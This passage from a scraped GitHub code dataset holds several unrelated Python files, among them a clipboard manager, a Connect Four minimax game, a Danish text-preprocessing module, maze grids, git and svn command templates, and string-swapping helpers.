return templates.TemplateResponse(\n \"result.html\", {\n \"request\": request,\n \"image\": base64.b64encode(buffered.getvalue()).decode(\"utf-8\")\n }\n )","repo_name":"pansershrek/StyleTransfer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22181412709","text":"import sys\r\nimport clipboard\r\nimport json\r\n\r\n# Saved data variable\r\nSAVED_DATA = \"clipboard.json\"\r\n\r\n\r\n# Write json file function\r\ndef save_data(filepath, data):\r\n with open(filepath, \"w\") as f:\r\n json.dump(data, f)\r\n\r\n# Read json file function\r\ndef load_data(filepath):\r\n try:\r\n with open(filepath, \"r\") as f:\r\n data = json.load(f)\r\n return data\r\n except:\r\n return {}\r\n\r\n# Setting 2 command line arguments \r\nif len(sys.argv) == 2:\r\n command = sys.argv[1]\r\n data = load_data(SAVED_DATA)\r\n\r\n# Save command adding new key's to dict\r\n if command == \"save\":\r\n key = input(\"Enter a key: \")\r\n data[key] = clipboard.paste()\r\n save_data(SAVED_DATA, data)\r\n print(\"Data saved!\")\r\n\r\n# Load command checks for valid key and saves value to user's clipboard\r\n elif command == \"load\":\r\n key = input(\"Enter a key: \")\r\n if key in data:\r\n clipboard.copy(data[key])\r\n print(\"Data copied to clipboard\")\r\n else:\r\n print(\"Key does not exist.\")\r\n# Delete command delete's key's and values from json file\r\n elif command == \"del\":\r\n key = input(\"Enter a key to remove: \")\r\n if key in data:\r\n del data[key]\r\n save_data(SAVED_DATA, data)\r\n print(\"Key removed from saved data\")\r\n else:\r\n print(\"Unknown key!\")\r\n # List command print's out saved key's and values\r\n elif command == \"list\":\r\n print(data)\r\n else:\r\n print(\"Unknown command\")\r\nelse:\r\n print(\"Please pass exactly one command.\")\r\n","repo_name":"Calebcampbell5/Clipboard","sub_path":"multiclipboard.py","file_name":"multiclipboard.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20631302891","text":"# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n \n # @param root : root node of tree\n # @param k : integer\n # @return an integer\n def kthsmallest(self, root, k):\n stack = []\n small_index = 0\n current = root\n done = 0\n while 
not done:\n if current:\n stack.append(current)\n current = current.left\n elif stack:\n current = stack.pop()\n small_index += 1\n if small_index == k:\n return current.val\n current = current.right\n else:\n done = 1\n return -1\n \n \n \n","repo_name":"EduardoVaca/Competitive-Programming","sub_path":"InterviewBit/kth_smallest_in_tree.py","file_name":"kth_smallest_in_tree.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42043501147","text":"class Brainquizz():\n\n\n def __init__(self,qlist):\n self.qn = 0\n\n self.ql = qlist\n\n def nextquestion(self):\n import sys\n score = 0\n se = self.ql[self.qn].text\n self.qn += 1\n new = input(f\"Q.{self.qn} {se} (True/False): \")\n anss = self.ql[self.qn -1].answer\n print(\"input off to exit qizz\")\n print(\"this is your ans\",new)\n print(\"this is right answer\",anss)\n if new == anss:\n score = score+1\n elif new == \"off\":\n sys.exit()\n print(\"your score\" ,score)\n\n\n\n","repo_name":"RajeevPrakashAD1/python_projects","sub_path":"nwe project quiz/brainquizz.py","file_name":"brainquizz.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8730979550","text":"import csv\nimport os\nimport shutil\nimport warnings\nimport swifter\n\nimport lemmy as lemmy\nimport pandas as pd\nimport numpy as np\nfrom nltk import SnowballStemmer\n\nfrom danlp.models import load_spacy_model\n\nimport re\n\nfrom numpy import loadtxt\nfrom tqdm import tqdm\nfrom bs4 import BeautifulSoup\n\nfrom predict import config\n\nwarnings.filterwarnings(\"ignore\", category=UserWarning, module='bs4')\ntqdm.pandas()\n\n\nclass Preprocess:\n\n dfs = None\n shared = None\n for_predict = False\n\n def __init__(self, shared, env='staging', for_predict=False):\n\n self.shared = shared\n self.for_predict = for_predict\n self.nlp = load_spacy_model()\n self.stemmer = SnowballStemmer('danish')\n self.lemmatizer = lemmy.load('da')\n self.word_list = loadtxt(f'{config.BASE_PATH}/data/input/danish-words.txt', dtype=str)\n\n if not self.for_predict:\n\n print(\"[Preprocess] Start\")\n\n # If in dev-mode we delete existing data.\n if env == 'dev' and self.shared.exists:\n shutil.rmtree(f'{self.shared.folder}/{self.shared.hashed}')\n self.shared.set_exists(False)\n\n if not self.shared.exists:\n self.dfs = [\n # pd.read_csv(config.PATH_INPUT_COMMUNICATION, nrows=self.shared.nrows),\n pd.read_csv(config.PATH_INPUT_REQUEST, nrows=self.shared.nrows)\n ]\n for idx, df in enumerate(self.dfs):\n self.dfs[idx] = df.fillna('')\n self.run()\n else:\n print(f'\\tThere is already a preprocessing-folder for that configuration')\n print(f'\\tRemove the folder {self.shared.folder}/{self.shared.hashed} to rebuild it')\n\n print(\"[Preprocess] End\")\n print(\"\")\n\n\n def run(self):\n\n for i, df in enumerate(self.dfs):\n for idx in self.shared.dfs_index[i]:\n\n self.remove_html_tags(df, idx)\n\n if self.shared.lemmatize:\n self.lemmatize(df, idx)\n\n if self.shared.stemming:\n self.stemming(df, idx)\n\n if self.shared.stopwords is not None:\n self.remove_stopwords(df, idx, self.shared)\n\n if self.shared.replace_match_regex is not None:\n self.replace_match_regex(df, idx, self.shared)\n\n if self.shared.remove_special_chars:\n self.remove_special_chars(df, idx)\n\n if self.shared.remove_unknown_words:\n self.remove_unknown_words(df, idx)\n\n self.remove_extra_spaces(df, idx)\n\n if not 
self.for_predict:\n # Make a folder for the preprocessed files\n os.makedirs(f'{self.shared.folder}/{self.shared.hashed}')\n\n # Output the files\n for idx, df_name in enumerate(self.shared.dfs_names):\n self.dfs[idx].to_csv(f'{self.shared.folder}/{self.shared.hashed}/{df_name}.csv', quotechar='\"', quoting=csv.QUOTE_NONNUMERIC)\n for index in self.shared.dfs_index[idx]:\n self.dfs[idx].to_csv(f'{self.shared.folder}/{self.shared.hashed}/{df_name}_{index}.csv', quotechar='\"', quoting=csv.QUOTE_NONNUMERIC, columns=[index], index=False)\n\n # Saved the config as JSON\n f = open(f'{self.shared.folder}/{self.shared.hashed}/config.json', 'a')\n f.write(self.shared.get_json())\n f.close()\n\n @staticmethod\n def get_lemmatize(x, nlp, lemmatizer):\n doc = nlp(x)\n texts = []\n skip = False\n for idx, tok in enumerate(doc):\n text = tok.lower_\n # We keep the tokens between <>\n if tok.lower_ == '<':\n skip = True\n elif tok.lower_ == '>':\n skip = False\n text = \"\".join([e.text for e in doc[idx - 2: idx + 1]])\n # Some tokens we keep\n elif tok.lower_ in ['jer', 'mange']:\n text = tok.lower_\n # Some tokens we alter\n elif tok.lower_[-3:] == 'rne':\n text = tok.lower_[:-1]\n # Some tokens we remove\n elif tok.lower_ in [',']:\n continue\n else:\n text = lemmatizer.lemmatize(tok.tag_, tok.lower_)[0]\n if not skip:\n texts.append(text)\n return \" \".join(texts)\n\n def lemmatize(self, df, index):\n df[index] = df[index].swifter.apply(Preprocess.get_lemmatize, nlp=self.nlp, lemmatizer=self.lemmatizer)\n \"\"\"\n if self.for_predict:\n df[index] = df.apply(lambda x: Preprocess.get_lemmatize(x[index], self.nlp, self.lemmatizer), axis=1)\n else:\n df[index] = df.progress_apply(lambda x: Preprocess.get_lemmatize(x[index], self.nlp, self.lemmatizer), axis=1)\n \"\"\"\n\n\n @staticmethod\n def get_stemmer(line, stemmer):\n text = \" \".join([stemmer.stem(e) for e in line.split(\" \")])\n return text\n\n def stemming(self, df, index):\n if self.for_predict:\n df[index] = df.apply(lambda x: Preprocess.get_stemmer(x[index], self.stemmer), axis=1)\n else:\n df[index] = df.progress_apply(lambda x: Preprocess.get_stemmer(x[index], self.stemmer), axis=1)\n\n @staticmethod\n def get_remove_html_tags(x):\n text = BeautifulSoup(x, \"lxml\").text\n text = text.replace(u'\\u00A0', ' ')\n return text\n\n def remove_html_tags(self, df, index):\n df[index] = df[index].swifter.apply(Preprocess.get_remove_html_tags)\n \"\"\"\n if self.for_predict:\n df[index] = df.apply(lambda x: Preprocess.get_remove_html_tags(x[index]), axis=1)\n else:\n df[index] = df.progress_apply(lambda x: Preprocess.get_remove_html_tags(x[index]), axis=1)\n\n \"\"\"\n\n @staticmethod\n def get_replace_match(line, regex_dict):\n text = line\n values = list(regex_dict.values())\n for i, e in enumerate(list(regex_dict.keys())):\n regexes = values[i]\n for regex in regexes:\n text = re.sub(regex, f' {e} ', text)\n return text\n\n def replace_match_regex(self, df, index, shared):\n if self.for_predict:\n df[index] = df.apply(lambda x: Preprocess.get_replace_match(x[index], shared.replace_match_regex), axis=1)\n else:\n df[index] = df.progress_apply(lambda x: Preprocess.get_replace_match(x[index], shared.replace_match_regex), axis=1)\n\n @staticmethod\n def get_remove_stopwords(line, stopwords):\n text = \" \".join([e for e in line.split(\" \") if e not in stopwords])\n return text\n\n def remove_stopwords(self, df, index, shared):\n df[index] = df.swifter.apply(lambda x: Preprocess.get_remove_stopwords(x[index], shared.stopwords), axis=1)\n \"\"\"\n 
if self.for_predict:\n df[index] = df.apply(lambda x: Preprocess.get_remove_stopwords(x[index], shared.stopwords), axis=1)\n else:\n df[index] = df.progress_apply(lambda x: Preprocess.get_remove_stopwords(x[index], shared.stopwords), axis=1)\n \"\"\"\n\n @staticmethod\n def get_remove_special_chars(text):\n text = re.sub('[^\\w\\s.<>]', ' ', text)\n text = re.sub('_', ' ', text)\n return text\n\n def remove_special_chars(self, df, index):\n if self.for_predict:\n df[index] = df.apply(lambda x: Preprocess.get_remove_special_chars(x[index]), axis=1)\n else:\n df[index] = df.progress_apply(lambda x: Preprocess.get_remove_special_chars(x[index]), axis=1)\n\n @staticmethod\n def get_remove_extra_spaces(text):\n text = re.sub('\\s\\s+', ' ', text)\n text = text.strip()\n return text\n\n def remove_extra_spaces(self, df, index):\n if self.for_predict:\n df[index] = df.apply(lambda x: Preprocess.get_remove_extra_spaces(x[index]), axis=1)\n else:\n df[index] = df.progress_apply(lambda x: Preprocess.get_remove_extra_spaces(x[index]), axis=1)\n\n @staticmethod\n def get_remove_unknown_words(x, bad_words):\n text = \" \".join([e for e in x.split(\" \") if e.lower() not in bad_words])\n return text\n\n def remove_unknown_words(self, df, index):\n words_dictionary = [e.lower() for e in self.word_list]\n lines = df[index].to_numpy()\n words = np.concatenate([[g.lower() for g in e.split(\" \")] for e in lines])\n words = np.unique(words)\n bad_words = [e for e in words if e not in words_dictionary]\n df[index] = df[index].swifter.apply(Preprocess.get_remove_unknown_words, bad_words=bad_words)\n # df[index] = df.progress_apply(lambda x: Preprocess.get_remove_unknown_words(x[index], self.word_list), axis=1)","repo_name":"T0mmy0lsen/IHLP-Helper","sub_path":"backend/saved/predict/model/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":8803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17292006772","text":"from seq2seq.seq2seqAvg import Seq2seqModel\nfrom util.intGradAnalyzer import AvgGrad\nimport importlib\nfrom util.config import *\nimport numpy as np\nimport argparse\nimport sys\nimport tensorflow as tf\n\n# to call a specific config file run as python3 seq2seq_avg.py util.myconfig\n# where the config file is at util/myconfig.py\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"data\", help=\"data set\", type=str)\nparser.add_argument(\"model_folder\", help=\"where saved model is\", type=str)\nparser.add_argument(\"h5\", help=\"best weights\", type=str)\nparser.add_argument(\"val_set\", help=\"set to predict on\", type=str)\nparser.add_argument(\"--step_size\", help=\"number of steps for integrated gradients\", default=50, type=int)\nparser.add_argument(\"-s\", \"--start\", default=0, type=int)\nargs = parser.parse_args()\n\n# get config\nsys.path.append(args.model_folder)\nfrom config import *\n\nfrom keras.backend.tensorflow_backend import set_session\nconfig = tf.ConfigProto()\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.4\nconfig.gpu_options.visible_device_list = \"0\"\nset_session(tf.Session(config=config))\n\n# get config file\nif args.data == 'Amazon':\n Config = AmazonConfig()\nelif args.data == 'Sentiment':\n Config = SentimentConfig()\n\nseq2seqModel = Seq2seqModel()\nevent2vec_lstm_model = seq2seqModel.createModel(Config)\nevent2vec_lstm_model.load_weights(args.h5)\nprint(event2vec_lstm_model.summary())\n\nattenAnalyzer = AvgGrad()\nattenAnalyzer.runGrad(Config, 
event2vec_lstm_model, args.model_folder, args.val_set, args.start, args.step_size)\nprint(__file__)\n\n","repo_name":"stephanieger/sequence-explainability","sub_path":"seq2seq_avg_int_grad.py","file_name":"seq2seq_avg_int_grad.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4419216213","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"todos\",\n version=\"0.0.2\",\n author=\"chincherpa\",\n author_email=\"accounts@mail.de\",\n description=\"Python CLI to manage your todos, with comments, tags and colors\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/chincherpa/todos\",\n packages=setuptools.find_packages(),\n entry_points={\"console_scripts\": [\"t=todos.todos:main\"]},\n python_requires='>=3.6',\n)\n","repo_name":"chincherpa/todos","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12953658158","text":"import copy\n\n\ndef defaultPrintBoard(Connect4):\n print('\\u250C\\u2500\\u2500\\u2500'+'\\u252C\\u2500\\u2500\\u2500'*(Connect4.width-1)+'\\u2510')\n for i in range(Connect4.height):\n string=''\n for j in range(Connect4.width):\n string+={1:' x \\u2502',-1:' o \\u2502',0:' \\u2502'}[Connect4.board[Connect4.height-1-i][j]]\n print('\\u2502'+string)\n # print('\\u251C\\u2500\\u2500\\u2500'+'\\u253C\\u2500\\u2500\\u2500'*(self.width-1)+'\\u2524')\n finalLine=''\n for column in range (0, Connect4.width):\n finalLine+='\\u2502 ' + str(column) + ' '\n finalLine+='\\u2502\\n\\u2514\\u2500\\u2500\\u2500'+'\\u2534\\u2500\\u2500\\u2500'*(Connect4.width-1)+'\\u2518'\n print(finalLine)\n print('Gamelog: '+str(Connect4.gameLog))\n\n\nclass Connect4:\n def __init__(self, pP, pN, pPparam={}, pNparam={}, height: int=6, width: int=7, printBoard=defaultPrintBoard) -> None:\n # someone help rename players\n self.currPlayer=1 # current player\n self.pP=pP # player positive\n self.pPpar=pPparam # player positive parameters\n self.pN=pN # player negative\n self.pNpar=pNparam # player negative parameters\n\n self.printBoard=lambda: printBoard(self)\n \n print(self.pP)\n self.board=[[0 for column in range(0, width)] for row in range(0, height)]\n self.height=height\n self.width=width\n self.gameLog=[]\n self.winner=None\n self.game()\n\n def game(self) -> None:\n self.printBoard()\n while True:\n if self.currPlayer==1:\n ai=self.pP(self, **self.pPpar)\n else:\n ai=self.pN(self, **self.pNpar)\n column=ai.move()\n self.makeMove(column)\n self.printBoard()\n if self.winCheck():\n self.winner=self.currPlayer\n print(\"Winner: \" + str(self.currPlayer))\n return\n if self.tieCheck():\n self.winner=0\n print(\"Tie\")\n return\n self.currPlayer*=-1\n\n def makeMove(self, column):\n for row in range(0, self.height):\n if self.board[row][column]==0:\n self.board[row][column]=self.currPlayer\n self.gameLog.append(column)\n return\n print('Error: full column')\n \n def winCheck(self):\n for row in range(0, len(self.board)): #horizontals\n for column in range(0, len(self.board[0])-3):\n if self.currPlayer==self.board[row][column]==self.board[row][column+1]==self.board[row][column+2]==self.board[row][column+3]:\n return True\n for row in range(0, len(self.board)-3): #verticals\n for column in range(0, len(self.board[0])):\n if 
self.currPlayer==self.board[row][column]==self.board[row+1][column]==self.board[row+2][column]==self.board[row+3][column]:\n return True\n for row in range(0, len(self.board)-3): #diagonals\n for column in range(0, len(self.board[0])-3):\n # /\n if self.currPlayer==self.board[row][column]==self.board[row+1][column+1]==self.board[row+2][column+2]==self.board[row+3][column+3]:\n return True\n # \\\n if self.currPlayer==self.board[row+3][column]==self.board[row+2][column+1]==self.board[row+1][column+2]==self.board[row][column+3]:\n return True\n return False\n\n def tieCheck(self):\n if len(self.gameLog)==self.height*self.width:\n return True\n return False\n\n\nclass DumBot:\n def __init__(self, game):\n self.game=game\n self.board=self.game.board\n \n def move(self):\n for column in range(0, len(self.board[0])):\n if self.board[-1][column]==0:\n return column\n print('Error: full board')\n\n\nclass HumanBot:\n def __init__(self, game):\n self.possibleMoves=[str(c) for c in range(len(game.board[0])) if game.board[-1][c]==0]\n pass\n\n def move(self):\n column=\"\"\n while not(column in self.possibleMoves):\n column=input('Type a column: ')\n return int(column)\n\n\nclass LinearScorer:\n def __init__(self, board, linearKey=lambda line: 0 if ((1 in line) and (-1 in line)) else sum(line)) -> None:\n self.board=board\n self.height=len(board)\n self.width=len(board[0])\n self.linearKey=linearKey\n\n def score(self):\n score=0\n for i in range (self.height):\n for j in range (self.width-3):\n line=[self.board[i][j],self.board[i][j+1],self.board[i][j+2],self.board[i][j+3]]\n score+=self.linearKey(line=line)\n for i in range (self.height-3):\n for j in range (self.width):\n line=[self.board[i][j],self.board[i+1][j],self.board[i+2][j],self.board[i+3][j]]\n score+=self.linearKey(line=line)\n for i in range (self.height-3):\n for j in range (self.width-3):\n line=[self.board[i][j],self.board[i+1][j+1],self.board[i+2][j+2],self.board[i+3][j+3]]\n score+=self.linearKey(line=line)\n line=[self.board[i][j+3],self.board[i+1][j+2],self.board[i+2][j+1],self.board[i+3][j]]\n score+=self.linearKey(line=line)\n return score\n\n\nclass RootMinimax:\n def __init__(self, game, depth: int=6, scorer=LinearScorer) -> None:\n self.board=game.board[:][:]\n self.depth=depth\n self.scorer=scorer\n self.currPlayer=game.currPlayer\n self.gameLen=len(game.gameLog)\n\n def move(self) -> int:\n possibleMoves=[c for c in range(len(self.board[0])) if self.board[-1][c]==0]\n scores={}\n for move in possibleMoves:\n tempBoard=copy.deepcopy(self.board[:][:])\n for row in range(0, len(tempBoard)):\n if tempBoard[row][move]==0:\n tempBoard[row][move]=self.currPlayer\n break\n c=ChildMinimax(board=tempBoard, depth=self.depth-1, scorer=self.scorer, currPlayer=-self.currPlayer, gameLen=self.gameLen+1)\n scores[move]=c.score()\n if self.currPlayer==1:\n return max(scores.items(), key=lambda x: x[1])[0]\n return min(scores.items(), key=lambda x: x[1])[0]\n\n\nclass ChildMinimax:\n def __init__(self, board, depth, scorer, currPlayer, gameLen) -> None:\n self.board=board[:][:]\n self.depth=depth\n self.scorer=scorer\n self.currPlayer=currPlayer\n self.gameLen=gameLen\n\n def score(self) -> float or int:\n # base cases\n if self.winCheck():\n return -self.currPlayer*float('inf')\n if self.tieCheck():\n return 0\n if self.depth==0:\n scorer=self.scorer(self.board)\n return scorer.score()\n\n\n # iterate through list of possible children and score each child\n # we don't need to keep track of which move is best bc this isn't the root\n 
possibleMoves=[c for c in range(len(self.board[0])) if self.board[-1][c]==0]\n scores=[]\n for move in possibleMoves:\n tempBoard=copy.deepcopy(self.board)\n for row in range(0, len(tempBoard)):\n if tempBoard[row][move]==0:\n tempBoard[row][move]=self.currPlayer\n break\n c=ChildMinimax(board=tempBoard, depth=self.depth-1, scorer=self.scorer, currPlayer=-self.currPlayer, gameLen=self.gameLen+1)\n scores.append(c.score())\n \n if self.currPlayer==1:\n return max(scores)\n return min(scores)\n\n def winCheck(self) -> bool:\n for row in range(0, len(self.board)): #horizontals\n for column in range(0, len(self.board[0])-3):\n if -self.currPlayer==self.board[row][column]==self.board[row][column+1]==self.board[row][column+2]==self.board[row][column+3]:\n return True\n for row in range(0, len(self.board)-3): #verticals\n for column in range(0, len(self.board[0])):\n if -self.currPlayer==self.board[row][column]==self.board[row+1][column]==self.board[row+2][column]==self.board[row+3][column]:\n return True\n for row in range(0, len(self.board)-3): #diagonals\n for column in range(0, len(self.board[0])-3):\n # /\n if -self.currPlayer==self.board[row][column]==self.board[row+1][column+1]==self.board[row+2][column+2]==self.board[row+3][column+3]:\n return True\n # \\\n if -self.currPlayer==self.board[row+3][column]==self.board[row+2][column+1]==self.board[row+1][column+2]==self.board[row][column+3]:\n return True\n return False\n\n def tieCheck(self) -> bool:\n if self.gameLen==len(self.board)*len(self.board[0]):\n return True\n return False\n\n\nif __name__ == \"__main__\":\n c=Connect4(HumanBot, RootMinimax, pNparam={'depth':4})","repo_name":"apksqrd/Connect-Four-Minimax","sub_path":"Conect Four v2.py","file_name":"Conect Four v2.py","file_ext":"py","file_size_in_byte":9053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33045165938","text":"from typing import List, Optional\n\nfrom maze.grid import Grid\nfrom maze.grid.triangle_cell import TriangleCell\n\n\nclass TriangleWithRectangularShapeGrid(Grid):\n def __init__(self, rows: int = 10, columns: int = 10):\n self.rows = rows\n self.columns = columns\n self.grid: List[List[Optional[TriangleCell]]] = []\n for l in range(self.rows):\n line = []\n for c in range(self.columns):\n line.append(None)\n self.grid.append(line)\n self.prepare_grid()\n self.configure_cells()\n\n def prepare_grid(self):\n for r in range(self.rows):\n for c in range(self.columns):\n self.grid[r][c] = TriangleCell(r, c)\n\n def configure_cells(self):\n for r in range(self.rows):\n for c in range(self.columns):\n if self.grid[r][c] is not None:\n if self.grid[r][c].is_upright:\n self.grid[r][c].south = self.get_cell(r + 1, c)\n else:\n self.grid[r][c].north = self.get_cell(r - 1, c)\n self.grid[r][c].west = self.get_cell(r, c - 1)\n self.grid[r][c].east = self.get_cell(r, c + 1)\n\n\nimport math\n\n\nclass TriangleWithTriangularShapeGrid(TriangleWithRectangularShapeGrid):\n def __init__(self, size: int):\n self.size = size\n super().__init__(rows=size, columns=size)\n\n def prepare_grid(self):\n for l in range(math.ceil(self.size / 2)):\n for c in range(l, self.size - l):\n self.grid[self.size - l - 1][c] = TriangleCell(self.size - l - 1, c)\n","repo_name":"Keirua/mazes-py","sub_path":"maze/grid/triangle_grid.py","file_name":"triangle_grid.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
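The base Grid class that both triangle grids in the record above inherit from (and the get_cell helper their configure_cells() calls) is not included in this dump, so the following is only a minimal, hypothetical sketch of the lookup they appear to assume: a bounds-checked index that returns None both for out-of-range coordinates and for the None holes of the triangular shape. The attribute names mirror what the subclasses populate in __init__; nothing here is the repository's actual code.

from typing import List, Optional

class Grid:
    # Hypothetical reconstruction; `rows`, `columns`, and `grid` mirror the
    # attributes TriangleWithRectangularShapeGrid fills in during __init__.
    rows: int
    columns: int
    grid: List[List[Optional["TriangleCell"]]]

    def get_cell(self, row: int, column: int) -> Optional["TriangleCell"]:
        # Out-of-range neighbours come back as None, and an in-range slot may
        # itself hold None (a hole outside the triangle); either way the
        # caller simply leaves that side of the cell unset.
        if 0 <= row < self.rows and 0 <= column < self.columns:
            return self.grid[row][column]
        return None

Under this assumption, configure_cells() needs no special casing for the triangular shape: wiring a neighbour that does not exist just assigns None.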
+{"seq_id":"35738340135","text":"\"\"\"tools module commands\"\"\"\n\nfrom devops_toolset.core.ValueDictsBase import ValueDictsBase\nfrom devops_toolset.core.app import App\n\napp: App = App()\n\n\nclass Commands(ValueDictsBase):\n \"\"\"Commands for the tools module.\"\"\"\n\n # Add your core literal dictionaries here\n _commands = {\n \"git_init\": \"git init {path}\",\n \"git_add\": \"git add .\",\n \"git_commit_m\": \"git commit -m \\\"{message}\\\"\",\n \"git_push_tag\": \"git {auth} push origin {tag_name}\",\n \"git_push_tag_delete\": \"git {auth} push --delete origin {tag_name}\",\n \"git_tag_add\": \"git tag -a {tag_name} {commit_name} -m {tag_name}\",\n \"git_tag_check\": \"git {auth} ls-remote {remote_name} \\\"refs/tags/{tag_name}\\\"\",\n \"git_tag_delete\": \"git tag -d {tag_name}\",\n \"public_ip_address_service_url\": \"http://checkip.dyndns.org\",\n \"git_auth\": \"-c http.extraheader=\\\"AUTHORIZATION: {auth_header}\\\"\",\n \"svn_add\": \"svn add \\\"{files_glob}\\\"\",\n \"svn_checkin\": \"svn ci -m \\\"{comment}\\\" --username {username} --password {password}\",\n \"svn_checkout\": \"svn co \\\"{url}\\\" \\\"{local_path}\\\"\",\n \"svn_copy\": \"svn cp \\\"{origin}\\\" \\\"{destination}\\\"\"\n }\n","repo_name":"aheadlabs/devops-toolset","sub_path":"src/devops_toolset/tools/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"21309957611","text":"# \"Easy things are hard.\" -> 'Problem 12= Flip 1 and 2 in 1+2=3 in this sentence.' \n\nimport hashlib\nimport random\n\n# helper function\ndef print_and_log(message, log_name):\n # Print the message to the console\n print(repr(message))\n print(message)\n\n # Append the message to the specified log file\n with open(log_name, 'a') as log_file:\n log_file.write(repr(message) + '\\n')\n\n\n# Helper Function\ndef string_get_seed_from_sha256_hash(input_string, log_name):\n \"\"\"\n turn input_string into a sha256 hash\n to use a seed to randomly but repeatably\n \"\"\"\n\n # start hash\n string_hash = hashlib.sha256()\n\n # remove escape characters\n input_string = input_string.replace(\"\\\\\", \"\")\n\n # remove escape ch\n # aracters\n input_string = input_string.replace(\"\\\\\\\\\", \"\")\n\n print_and_log(f\"input string for seed: {input_string}\", log_name)\n\n # hash the string\n string_hash.update(input_string.encode('utf-8'))\n\n # make the hash an int not hex\n string_hash = string_hash.hexdigest()\n\n print_and_log(f\"hash for seed: {string_hash}\", log_name)\n\n return string_hash\n\n\n# helper_function\ndef swap_two(input_string, item_1, item_2):\n \"\"\"\n Swap two items in a string. Tada!\n\n or change only the first item, the 2nd item is optional.\n\n protection from swap-collisions is included\n \"\"\"\n\n original_string = input_string\n\n # validity sanity check (item_2 is optional, only item 1 is needed)\n if item_1 not in input_string:\n print(f\"NOTHING DONE: item to match not in string -> {item_1} vs. 
{input_string}\")\n return input_string\n\n use_this_placeholder = ';;;<<<'\n\n \"\"\"all possible ascii placeholders, and more:\n while there is a risk of item 1 or two coliding with the placeholder\n there is also a risk of the placeholder coliding with part of the string\n the longer the string, the more likely it contains any given single\n ascii character \n \"\"\"\n placeholder_list = [\n '!!!\"\"\"', '###$$$', '%&%&%&', \"'''(((\", ')))***', \n '+++,,,', '---...', '///000', '111222', '333444', \n '555666', '777888', '999:::', ';;;<<<', '===>>>', \n '???@@@', 'AAABBB', 'CCCDDD', 'EEEFFF', 'GGGHHH', \n 'IIIJJJ', 'KKKLLL', 'MMMNNN', 'OOOPPP', 'QQQRRR', \n 'SSSTTT', 'UUUVVV', 'WWWXXX', 'YYYZZZ', '[[[sss', \n ']]]^^^', '___```', 'aaabbb', 'cccddd', 'eeefff', \n 'ggghhh', 'iiijjj', 'kkklll', 'mmmnnn', 'oooppp', \n 'qqqrrr', 'sssttt', 'uuuvvv', 'wwwxxx', 'yyyzzz', \n '{|{{|||', '}~}~}~~~',\n '!', '\"', '#', '$', '%', '&', \"'\", '(', \n ')', '*', '+', ',', '-', '.', '/', '0', '1', \n '2', '3', '4', '5', '6', '7', '8', '9', ':', \n ';', '<', '=', '>', '?', '@', 'A', 'B', 'C', \n 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', \n 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', \n 'V', 'W', 'X', 'Y', 'Z', '[', ']', '^', \n '_', '`', 'a', 'b', 'c', 'd', 'e', 'f', 'g', \n 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', \n 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', \n 'z', '{', '|', '}', '~', \n ]\n\n \"\"\"\n check that:\n item_2 is not in placeholder\n that placeholder does not collide with something in string\n \"\"\"\n placeholder_ok = False\n for this_placeholder in placeholder_list:\n print(f\"trying -> '{this_placeholder}'\")\n if (item_1 not in this_placeholder) and (item_2 not in this_placeholder) and (this_placeholder not in input_string):\n use_this_placeholder = this_placeholder\n placeholder_ok = True\n print(f\"use_this_placeholder -> {use_this_placeholder}\")\n break\n else:\n print(\"collision detected, try next placeholder...\")\n\n if not placeholder_ok:\n # print error message and exit program\n message = \"\"\"FAILED: collision error, \n for swap_two(), \n a new placeholder needed. 
\n    \n    action item: add novel option to placeholder_list\n    \"\"\"\n        print(message)\n        sys.exit()\n\n    # Replace item_1 with a temporary placeholder\n    output_swapped_string = input_string.replace(item_1, use_this_placeholder)\n    print(output_swapped_string)\n\n    # Replace item_2 with item_1\n    output_swapped_string = output_swapped_string.replace(item_2, item_1)\n    print(output_swapped_string)\n\n    # Replace that temporary placeholder with item_2 (done and done)\n    output_swapped_string = output_swapped_string.replace(use_this_placeholder, item_2)\n\n    message = f\"\"\"\n    Final comparison:\n    old -> {original_string}\n    new -> {output_swapped_string}\n    \"\"\"\n    print(message)\n\n    return output_swapped_string\n\n\n# helper function\ndef apply_swap(input_string, log_name, error_description, item_1, item_2):\n    \"\"\"\n    requires: \n    import hashlib\n    import random\n    import sys\n    \n    requires/uses helper functions:\n    print_and_log(message, log_name)\n    string_get_seed_from_sha256_hash(input_string, log_name)\n    swap_two(selected_segment, item_1, item_2)\n    \n    This function: \n    input parameters: apply_swap(input_string, log_name, error_description, item_1, item_2)\n    \n    apply_swap() function logs and applies a swap\n    to an equation, deterministically-randomly to some segment of the equation,\n    where the item is found,\n\n    It checks for indices where both 